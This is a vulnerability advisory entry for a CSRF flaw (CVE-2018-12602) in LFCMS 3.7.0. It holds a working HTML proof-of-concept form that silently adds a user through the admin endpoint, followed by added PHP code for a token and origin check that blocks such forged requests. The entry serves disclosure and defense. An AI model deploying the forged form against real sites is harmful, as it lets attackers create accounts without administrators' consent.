CVE | Category | Price | Severity |
---|---|---|---|
CVE-2018-12602 | CWE-352 | $500 | High |

Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-06-22 |

CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L | 0.2634 | 0.78937 |
```
# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
# Date: 2018-06-20
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html
# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
# Version: 3.7.0
# CVE : CVE-2018-12602
```

A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily. The payload for attack is as follows.

```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
      <input type="hidden" name="username" value="test222" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="password" value="test222" />
      <input type="hidden" name="repassword" value="test222" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
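The form above succeeds because the add-user action accepts any POST that arrives with the administrator's session cookie. As an added example (not LFCMS code and not part of the original advisory), this is a server-side guard of the kind that rejects such a request; the function names, the `csrf_token` field and the `TRUSTED_ORIGIN` value are assumptions made for illustration.

```php
<?php
// Added example, not LFCMS code: CSRF guard for a state-changing admin POST.
const TRUSTED_ORIGIN = 'http://10.211.55.17'; // assumption: the admin site's own origin

/** Issue (or reuse) the per-session token to embed in the legitimate add-user form. */
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Reduce an Origin or Referer header value to scheme://host[:port], or null if unparseable. */
function origin_of(string $url): ?string
{
    $p = parse_url($url);
    if (!is_array($p) || empty($p['scheme']) || empty($p['host'])) {
        return null;
    }
    $port = isset($p['port']) ? ':' . $p['port'] : '';
    return strtolower($p['scheme'] . '://' . $p['host']) . $port;
}

/** True only for a POST whose origin (if sent) is ours and whose token matches the session. */
function csrf_check(array $server, array $post, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false; // state changes must not be reachable via GET
    }
    $hdr = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($hdr !== null && origin_of($hdr) !== TRUSTED_ORIGIN) {
        return false; // the submitting page lives on another site (or sent "null")
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($supplied) && hash_equals($expected, $supplied);
}

// Constructed requests: the PoC's fields without a token vs. the real admin form.
$session = [];
$token   = csrf_issue_token($session);
$fields  = ['username' => 'test222', 'password' => 'test222', 'repassword' => 'test222'];
$forged  = csrf_check(['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'], $fields, $session);
$genuine = csrf_check(['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => TRUSTED_ORIGIN], $fields + ['csrf_token' => $token], $session);
var_dump($forged, $genuine);
```

In a real handler the three arrays would be `$_SERVER`, `$_POST` and `$_SESSION`, with the token written into the add-user form as a hidden field. The `history.pushState` call in the PoC only rewrites the path the browser reports, so the origin comparison is unaffected by it.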